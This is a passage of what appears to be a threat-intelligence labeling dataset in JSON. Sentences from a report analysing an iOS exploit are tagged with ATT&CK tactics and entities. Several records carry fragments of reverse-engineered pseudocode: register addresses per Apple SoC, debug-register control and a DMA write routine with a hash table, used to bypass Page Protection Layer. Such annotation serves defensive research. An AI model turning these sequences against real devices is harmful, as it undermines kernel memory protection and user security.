"writing to some other MMIO register", "start": 58, "end": 93, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p6-s56-7d3fec", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 6, "sentence_id": 56, "context_before": "The first thing the exploit does during initialization is writing to some other MMIO register, which is located at a different address for each SoC.\n5/18", "sentence_text": "1 if (cpuid == 0x8765EDEA): # CPUFAMILY_ARM_EVEREST_SAWTOOTH (A16)\n2 base = 0x23B700408 3 command = 0x1F0023FF 5 elif (cpuid == 0xDA33D83D): # CPUFAMILY_ARM_AVALANCHE_BLIZZARD (A15)\n6 base = 0x23B7003C8 7 command = 0x1F0023FF 9 elif (cpuid == 0x1B588BB3): # CPUFAMILY_ARM_FIRESTORM_ICESTORM (A14)\n10 base = 0x23B7003D0 11 command = 0x1F0023FF 13 elif (cpuid == 0x462504D2): # CPUFAMILY_ARM_LIGHTNING_THUNDER (A13)\n14 base = 0x23B080390 15 command = 0x1F0003FF 17 elif (cpuid == 0x07D34B9F): # CPUFAMILY_ARM_VORTEX_TEMPEST (A12)\n18 base = 0x23B080388 19 command = 0x1F0003FF 21 if ((~read_dword(base) & 0xF) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p6-s57-05cb82", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 6, "sentence_id": 57, "context_before": "1 if (cpuid == 0x8765EDEA): # CPUFAMILY_ARM_EVEREST_SAWTOOTH (A16)\n2 base = 0x23B700408 3 command = 0x1F0023FF 5 elif (cpuid == 0xDA33D83D): # CPUFAMILY_ARM_AVALANCHE_BLIZZARD (A15)\n6 base = 0x23B7003C8 7 command = 0x1F0023FF 9 elif (cpuid == 0x1B588BB3): # CPUFAMILY_ARM_FIRESTORM_ICESTORM (A14)\n10 base = 0x23B7003D0 11 command = 0x1F0023FF 13 elif (cpuid == 0x462504D2): # CPUFAMILY_ARM_LIGHTNING_THUNDER (A13)\n14 base = 0x23B080390 15 command = 0x1F0003FF 17 elif (cpuid == 0x07D34B9F): # CPUFAMILY_ARM_VORTEX_TEMPEST (A12)\n18 base = 0x23B080388 19 command = 0x1F0003FF 21 if ((~read_dword(base) & 0xF) !", "sentence_text": "== 0):\n25 break\nPseudocode for the GFX power manager control code from the exploit 6/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s58-721e89", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 58, "context_before": "== 0):\n25 break\nPseudocode for the GFX power manager control code from the exploit 6/18", "sentence_text": "Finally, I obtained a third confirmation when I decided to try and access the registers located in these unknown regions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s59-371b9a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 59, "context_before": "Finally, I obtained a third confirmation when I decided to try and access the registers located in these unknown regions.", "sentence_text": "This way, I was able to confirm that all these unknown MMIO registers used for the exploitation belonged to the GPU coprocessor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s60-f7e850", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 60, "context_before": "This way, I was able to confirm that all these unknown MMIO registers used for the exploitation belonged to the GPU coprocessor.", "sentence_text": "I decided to take a closer look at how the exploit operated these unknown MMIO registers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s61-25ef36", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 61, "context_before": "I decided to take a closer look at how the exploit operated these unknown MMIO registers.", "sentence_text": "The register 0x206040000 stands out from all the others because it is located in a separate MMIO block from all the other registers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s62-4e9d38", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 62, "context_before": "The register 0x206040000 stands out from all the others because it is located in a separate MMIO block from all the other registers.", "sentence_text": "It is touched only during the initialization and finalization stages of the exploit: it is the first register to be set during initialization and the last one, during finalization.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": null, "procedure": "The exploit sets a hardware register during initialization and finalization.", "entities": [ { "text": "is touched only during the initialization", "start": 3, "end": 44, "label": "Action" }, { "text": "to be set during initialization", "start": 110, "end": 141, "label": "Action" }, { "text": "the first register", "start": 91, "end": 109, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p7-s63-d00e29", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 63, "context_before": "It is touched only during the initialization and finalization stages of the exploit: it is the first register to be set during initialization and the last one, during finalization.", "sentence_text": "From my experience, it was clear that the register either enabled/disabled the hardware feature used by the exploit or controlled interrupts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s64-7a0a7d", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 64, "context_before": "From my experience, it was clear that the register either enabled/disabled the hardware feature used by the exploit or controlled interrupts.", "sentence_text": "Below, you can see the reverse-engineered code of the exploit that I was able to recognize.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p7-s65-86723a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 7, "sentence_id": 65, "context_before": "Below, you can see the reverse-engineered code of the exploit that I was able to recognize.", "sentence_text": "I have given it a proper name.\n7/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p8-s66-cc8d37", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 8, "sentence_id": 66, "context_before": "I have given it a proper name.\n7/18", "sentence_text": "= 0):\n12 break\n14 def ml_dbgwrap_unhalt_cpu():\n16 value = read_qword(0x206040000)\n18 value = (value & 0xFFFFFFFF2FFFFFFF) | 0x40000000 19 write_qword(0x206040000, value)\n21 while (True):\n22 if ((read_qword(0x206040000) & 0x10000000)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p8-s67-45bec1", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 8, "sentence_id": 67, "context_before": "= 0):\n12 break\n14 def ml_dbgwrap_unhalt_cpu():\n16 value = read_qword(0x206040000)\n18 value = (value & 0xFFFFFFFF2FFFFFFF) | 0x40000000 19 write_qword(0x206040000, value)\n21 while (True):\n22 if ((read_qword(0x206040000) & 0x10000000)", "sentence_text": "== 0):\n23 break\nPseudocode for the usage of the, 0x206040000 register by the exploit I was able to match the ml_dbgwrap_halt_cpu function from the pseudocode above to a function with the same name in the dbgwrap.c file of the XNU source code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p8-s68-d0f662", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 8, "sentence_id": 68, "context_before": "== 0):\n23 break\nPseudocode for the usage of the, 0x206040000 register by the exploit I was able to match the ml_dbgwrap_halt_cpu function from the pseudocode above to a function with the same name in the dbgwrap.c file of the XNU source code.", "sentence_text": "This file contains code for working with the ARM CoreSight MMIO debug registers of the main CPU.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s70-7bb9f4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 70, "context_before": "PMU, and UTT.", "sentence_text": "Each occupies 0x10000 bytes, and they are all located next to one another.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s71-5cea48", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 71, "context_before": "Each occupies 0x10000 bytes, and they are all located next to one another.", "sentence_text": "I was able to confirm that 0x206000000–0x206050000 was indeed a block of CoreSight MMIO debug registers for the GPU coprocessor by writing ARM_DBG_LOCK_ACCESS_KEY to the corresponding location.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s72-0f2dcd", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 72, "context_before": "I was able to confirm that 0x206000000–0x206050000 was indeed a block of CoreSight MMIO debug registers for the GPU coprocessor by writing ARM_DBG_LOCK_ACCESS_KEY to the corresponding location.", "sentence_text": "It is also interesting that the author(s) of this exploit knew how to use the proprietary Apple UTT region to unhalt the CPU: this code is not part of the XNU source code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s73-e30fba", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 73, "context_before": "It is also interesting that the author(s) of this exploit knew how to use the proprietary Apple UTT region to unhalt the CPU: this code is not part of the XNU source code.", "sentence_text": "Perhaps it is fair to say that this could easily be found out through experimentation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s74-f6fcba", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 74, "context_before": "Perhaps it is fair to say that this could easily be found out through experimentation.", "sentence_text": "Something that cannot be found that way is what the attackers did with the registers in the second unknown region.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s75-f2bdd7", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 75, "context_before": "Something that cannot be found that way is what the attackers did with the registers in the second unknown region.", "sentence_text": "I am not sure what blocks of MMIO debug registers are located there, or how the attackers found out how to use them if they were not used by the firmware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s76-d49eb4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 76, "context_before": "I am not sure what blocks of MMIO debug registers are located there, or how the attackers found out how to use them if they were not used by the firmware.", "sentence_text": "Let us look at the remaining unknown registers used by the exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s77-45f2ca", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 77, "context_before": "Let us look at the remaining unknown registers used by the exploit.", "sentence_text": "The registers 0x206140008 and 0x206140108 control enabling/disabling and running the hardware feature used by the exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p9-s78-74803b", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 9, "sentence_id": 78, "context_before": "The registers 0x206140008 and 0x206140108 control enabling/disabling and running the hardware feature used by the exploit.", "sentence_text": "1 def dma_ctrl_1():\n3 ctrl = 0x206140108 5 value = read_qword(ctrl)\n6 write_qword(ctrl, value | 0x8000000000000001)\n7 sleep(1)\n9 while ((~read_qword(ctrl) & 0x8000000000000001) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p10-s79-0a2644", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 10, "sentence_id": 79, "context_before": "1 def dma_ctrl_1():\n3 ctrl = 0x206140108 5 value = read_qword(ctrl)\n6 write_qword(ctrl, value | 0x8000000000000001)\n7 sleep(1)\n9 while ((~read_qword(ctrl) & 0x8000000000000001) !", "sentence_text": "14 ctrl = 0x206140008 16 value = read_qword(ctrl)\n18 if (flag):\n19 if ((value & 0x1000000000000000) == 0):\n20 value = value | 0x1000000000000000 21 write_qword(ctrl, value)\n22 else:\n23 if ((value & 0x1000000000000000) !", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p11-s80-c6184e", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 11, "sentence_id": 80, "context_before": "14 ctrl = 0x206140008 16 value = read_qword(ctrl)\n18 if (flag):\n19 if ((value & 0x1000000000000000) == 0):\n20 value = value | 0x1000000000000000 21 write_qword(ctrl, value)\n22 else:\n23 if ((value & 0x1000000000000000) !", "sentence_text": "42 dma_ctrl_3(original_value_0x206140108)\n44 def dma_done(original_value_0x206140108):\n46 dma_ctrl_1()\n47 dma_ctrl_2(True)\n48 dma_ctrl_3(original_value_0x206140108)\nPseudocode for the usage of the 0x206140008 and 0x206140108 registers by the exploit The register 0x206150020 is used only for Apple A15/A16 Bionic SoCs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p11-s81-d7b8ac", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 11, "sentence_id": 81, "context_before": "42 dma_ctrl_3(original_value_0x206140108)\n44 def dma_done(original_value_0x206140108):\n46 dma_ctrl_1()\n47 dma_ctrl_2(True)\n48 dma_ctrl_3(original_value_0x206140108)\nPseudocode for the usage of the 0x206140008 and 0x206140108 registers by the exploit The register 0x206150020 is used only for Apple A15/A16 Bionic SoCs.", "sentence_text": "It is set to 1 during the initialization stage of the exploit, and to its original value, during the finalization stage.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": null, "procedure": "The exploit modifies a register during initialization and restores it later.", "entities": [ { "text": "is set to 1 during the initialization", "start": 3, "end": 40, "label": "Action" }, { "text": "during the finalization stage", "start": 90, "end": 119, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p11-s82-85a341", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 11, "sentence_id": 82, "context_before": "It is set to 1 during the initialization stage of the exploit, and to its original value, during the finalization stage.", "sentence_text": "The register 0x206150040 is used to store some flags and the lower half of the destination physical address.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p11-s83-c769a6", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 11, "sentence_id": 83, "context_before": "The register 0x206150040 is used to store some flags and the lower half of the destination physical address.", "sentence_text": "This hardware feature writes the data in aligned blocks of 0x40 bytes, and everything should be written to the 0x206150048 register in nine sequential writes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p11-s84-3a12ee", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 11, "sentence_id": 84, "context_before": "This hardware feature writes the data in aligned blocks of 0x40 bytes, and everything should be written to the 0x206150048 register in nine sequential writes.", "sentence_text": "1 if (cpuid == 0x8765EDEA): # CPUFAMILY_ARM_EVEREST_SAWTOOTH (A16)\n2 i = 8 3 mask = 0x7FFFFFF 5 elif (cpuid == 0xDA33D83D): # CPUFAMILY_ARM_AVALANCHE_BLIZZARD (A15)\n6 i = 8 7 mask = 0x3FFFFF 9 elif (cpuid == 0x1B588BB3): # CPUFAMILY_ARM_FIRESTORM_ICESTORM (A14)\n10 i = 0x28 11 mask = 0x3FFFFF 11/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p12-s85-3eda02", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 12, "sentence_id": 85, "context_before": "1 if (cpuid == 0x8765EDEA): # CPUFAMILY_ARM_EVEREST_SAWTOOTH (A16)\n2 i = 8 3 mask = 0x7FFFFFF 5 elif (cpuid == 0xDA33D83D): # CPUFAMILY_ARM_AVALANCHE_BLIZZARD (A15)\n6 i = 8 7 mask = 0x3FFFFF 9 elif (cpuid == 0x1B588BB3): # CPUFAMILY_ARM_FIRESTORM_ICESTORM (A14)\n10 i = 0x28 11 mask = 0x3FFFFF 11/18", "sentence_text": "13 elif (cpuid == 0x462504D2): # CPUFAMILY_ARM_LIGHTNING_THUNDER (A13)\n14 i = 0x28 15 mask = 0x3FFFFF 17 elif (cpuid == 0x07D34B9F): # CPUFAMILY_ARM_VORTEX_TEMPEST (A12)\n18 i = 0x28 19 mask = 0x3FFFFF 21 dma_init(original_value_0x206140108)\n23 hash1 = calculate_hash(data)\n24 hash2 = calculate_hash(data+0x20)\n26 write_qword(0x206150040, 0x2000000 | (phys_addr & 0x3FC0))\n28 pos = 0 29 while (pos < 0x40):\n30 write_qword(0x206150048, read_qword(data + pos))\n31 pos += 8 33 phys_addr_upper = ((((phys_addr >> 14) & mask) << 18) & 0x3FFFFFFFFFFFF)\n34 value = phys_addr_upper | (hash1 << i) | (hash2 << 50) | 0x1F 35 write_qword(0x206150048, value)\n37 dma_done(original_value_0x206140108)\nPseudocode for the usage of the 0x206150040 and 0x206150048 registers by the exploit 12/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p13-s86-47422a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 86, "context_before": "13 elif (cpuid == 0x462504D2): # CPUFAMILY_ARM_LIGHTNING_THUNDER (A13)\n14 i = 0x28 15 mask = 0x3FFFFF 17 elif (cpuid == 0x07D34B9F): # CPUFAMILY_ARM_VORTEX_TEMPEST (A12)\n18 i = 0x28 19 mask = 0x3FFFFF 21 dma_init(original_value_0x206140108)\n23 hash1 = calculate_hash(data)\n24 hash2 = calculate_hash(data+0x20)\n26 write_qword(0x206150040, 0x2000000 | (phys_addr & 0x3FC0))\n28 pos = 0 29 while (pos < 0x40):\n30 write_qword(0x206150048, read_qword(data + pos))\n31 pos += 8 33 phys_addr_upper = ((((phys_addr >> 14) & mask) << 18) & 0x3FFFFFFFFFFFF)\n34 value = phys_addr_upper | (hash1 << i) | (hash2 << 50) | 0x1F 35 write_qword(0x206150048, value)\n37 dma_done(original_value_0x206140108)\nPseudocode for the usage of the 0x206150040 and 0x206150048 registers by the exploit 12/18", "sentence_text": "As long as everything is done correctly, the hardware should perform a direct memory access (DMA) operation and write the data to the requested location.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": null, "procedure": "The exploit performs a DMA operation to write data to memory.", "entities": [ { "text": "perform a direct memory access (DMA) operation", "start": 61, "end": 107, "label": "Action" }, { "text": "write the data to the requested location", "start": 112, "end": 152, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p13-s87-4253f4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 87, "context_before": "As long as everything is done correctly, the hardware should perform a direct memory access (DMA) operation and write the data to the requested location.", "sentence_text": "The exploit uses this hardware feature as a Page Protection Layer (PPL) bypass, mainly for patching page table entries.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Use hardware feature to bypass Page Protection Layer and modify page table entries.", "entities": [ { "text": "The exploit", "start": 0, "end": 11, "label": "MalwareTool" }, { "text": "uses this hardware feature as a Page Protection Layer (PPL) bypass", "start": 12, "end": 78, "label": "Action" }, { "text": "patching page table entries", "start": 91, "end": 118, "label": "Action" } ] }, { "uid": "aptnotes-12_aptnotes_report-p13-s88-d934ba", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 88, "context_before": "The exploit uses this hardware feature as a Page Protection Layer (PPL) bypass, mainly for patching page table entries.", "sentence_text": "It can also be used for patching the data in the protected __", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p13-s90-c31695", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 90, "context_before": "PPLDATA segment.", "sentence_text": "The exploit does not use the feature to patch the kernel code, but once during a test, I was able to overwrite an instruction in the __TEXT_EXEC segment of the kernel and get an “Undefined Kernel Instruction” panic with the expected address and value.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": null, "procedure": "The exploit can overwrite instructions in kernel memory.", "entities": [ { "text": "overwrite an instruction", "start": 101, "end": 125, "label": "Action" }, { "text": "kernel", "start": 160, "end": 166, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-12_aptnotes_report-p13-s91-b35cb5", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 91, "context_before": "The exploit does not use the feature to patch the kernel code, but once during a test, I was able to overwrite an instruction in the __TEXT_EXEC segment of the kernel and get an “Undefined Kernel Instruction” panic with the expected address and value.", "sentence_text": "This only worked once—the other times I tried I got an AMCC panic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p13-s92-ec5543", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 92, "context_before": "This only worked once—the other times I tried I got an AMCC panic.", "sentence_text": "Now that all the work with all the MMIO registers has been covered, let us take a look at one last thing: how hashes are calculated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p13-s93-3a40f7", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 13, "sentence_id": 93, "context_before": "Now that all the work with all the MMIO registers has been covered, let us take a look at one last thing: how hashes are calculated.", "sentence_text": "The algorithm is shown below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p14-s94-a72203", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 14, "sentence_id": 94, "context_before": "The algorithm is shown below.", "sentence_text": "19 0x0EC, 0x1A6, 0x29A, 0x266, 0x1A9, 0x269, 0x319, 0x2C3, 20 0x323, 0x068, 0x0A4, 0x118, 0x0C2, 0x122, 0x214, 0x141, 21 0x221, 0x0F4, 0x16C, 0x1AA, 0x2A9, 0x325, 0x343, 0x0F8, 22 0x174, 0x1AC, 0x2AA, 0x326, 0x329, 0x345, 0x383, 0x070, 23 0x0A8, 0x0C4, 0x124, 0x218, 0x142, 0x222, 0x181, 0x241, 24 0x178, 0x2AC, 0x32A, 0x2D1, 0x0B0, 0x0C8, 0x128, 0x144, 25 0x1B8, 0x224, 0x1D4, 0x182, 0x242, 0x2D2, 0x32C, 0x281, 26 0x351, 0x389, 0x1D8, 0x2D4, 0x352, 0x38A, 0x391, 0x0D0, 27 0x130, 0x148, 0x228, 0x184, 0x244, 0x282, 0x301, 0x1E4, 28 0x2D8, 0x354, 0x38C, 0x392, 0x1E8, 0x2E4, 0x358, 0x394, 29 0x362, 0x3A1, 0x150, 0x230, 0x188, 0x248, 0x284, 0x302, 30 0x1F0, 0x2E8, 0x364, 0x398, 0x3A2, 0x0E0, 0x190, 0x250, 31 0x2F0, 0x288, 0x368, 0x304, 0x3A4, 0x370, 0x3A8, 0x3C4, 32 0x160, 0x290, 0x308, 0x3B0, 0x3C8, 0x3D0, 0x1A0, 0x260, 33 0x310, 0x1C0, 0x2A0, 0x3E0, 0x2C0, 0x320, 0x340, 0x380 34 ]\n36 def calculate_hash(buffer):\n38 acc = 0 39 for i in range(8):\n40 pos", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s95-ccdee5", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 95, "context_before": "19 0x0EC, 0x1A6, 0x29A, 0x266, 0x1A9, 0x269, 0x319, 0x2C3, 20 0x323, 0x068, 0x0A4, 0x118, 0x0C2, 0x122, 0x214, 0x141, 21 0x221, 0x0F4, 0x16C, 0x1AA, 0x2A9, 0x325, 0x343, 0x0F8, 22 0x174, 0x1AC, 0x2AA, 0x326, 0x329, 0x345, 0x383, 0x070, 23 0x0A8, 0x0C4, 0x124, 0x218, 0x142, 0x222, 0x181, 0x241, 24 0x178, 0x2AC, 0x32A, 0x2D1, 0x0B0, 0x0C8, 0x128, 0x144, 25 0x1B8, 0x224, 0x1D4, 0x182, 0x242, 0x2D2, 0x32C, 0x281, 26 0x351, 0x389, 0x1D8, 0x2D4, 0x352, 0x38A, 0x391, 0x0D0, 27 0x130, 0x148, 0x228, 0x184, 0x244, 0x282, 0x301, 0x1E4, 28 0x2D8, 0x354, 0x38C, 0x392, 0x1E8, 0x2E4, 0x358, 0x394, 29 0x362, 0x3A1, 0x150, 0x230, 0x188, 0x248, 0x284, 0x302, 30 0x1F0, 0x2E8, 0x364, 0x398, 0x3A2, 0x0E0, 0x190, 0x250, 31 0x2F0, 0x288, 0x368, 0x304, 0x3A4, 0x370, 0x3A8, 0x3C4, 32 0x160, 0x290, 0x308, 0x3B0, 0x3C8, 0x3D0, 0x1A0, 0x260, 33 0x310, 0x1C0, 0x2A0, 0x3E0, 0x2C0, 0x320, 0x340, 0x380 34 ]\n36 def calculate_hash(buffer):\n38 acc = 0 39 for i in range(8):\n40 pos", "sentence_text": "I tried to search for it in a large collection of binaries, but found nothing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s96-72f622", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 96, "context_before": "I tried to search for it in a large collection of binaries, but found nothing.", "sentence_text": "It is best summarized with the term “security by obscurity“.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s97-e1d2d1", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 97, "context_before": "It is best summarized with the term “security by obscurity“.", "sentence_text": "How could attackers discover and exploit this hardware feature if it is not used and there are no instructions anywhere in the firmware on how to use it?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s98-eaa841", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 98, "context_before": "How could attackers discover and exploit this hardware feature if it is not used and there are no instructions anywhere in the firmware on how to use it?", "sentence_text": "I ran one more test.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s99-a02d20", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 99, "context_before": "I ran one more test.", "sentence_text": "I checked and found that the M1 chip inside the Mac also has this unknown hardware feature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s100-c891e9", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 100, "context_before": "I checked and found that the M1 chip inside the Mac also has this unknown hardware feature.", "sentence_text": "Then I used the amazing m1n1 tool to conduct an experiment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s101-670051", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 101, "context_before": "Then I used the amazing m1n1 tool to conduct an experiment.", "sentence_text": "This tool has a trace_range function, which traces all access to a provided range of MMIO registers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s102-7beb85", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 102, "context_before": "This tool has a trace_range function, which traces all access to a provided range of MMIO registers.", "sentence_text": "I used it to set up tracing for the memory range 0x206110000–0x206400000, but it reported no usage of these registers by macOS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p15-s103-6946c8", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 15, "sentence_id": 103, "context_before": "I used it to set up tracing for the memory range 0x206110000–0x206400000, but it reported no usage of these registers by macOS.", "sentence_text": "Through an amazing coincidence, both my 37C3 presentation and this post discuss a vulnerability very similar to the one I talked about during my presentation at the 36th Chaos Communication Congress (36C3) in 2019.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s105-7ad591", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 105, "context_before": "15/18", "sentence_text": "Watch Video At: https://youtu.be/WW39dsbffMw", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s106-7d1a23", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 106, "context_before": "Watch Video At: https://youtu.be/WW39dsbffMw", "sentence_text": "I was able to discover and exploit this vulnerability, because earlier versions of the firmware used these registers for all DRAM operations, but then Sony stopped using them and started just accessing DRAM directly, because all DRAM was also mapped to the CPU address space.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s107-2b3ea3", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 107, "context_before": "I was able to discover and exploit this vulnerability, because earlier versions of the firmware used these registers for all DRAM operations, but then Sony stopped using them and started just accessing DRAM directly, because all DRAM was also mapped to the CPU address space.", "sentence_text": "Because no one was using these registers anymore and I knew how to use them, I took advantage of them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 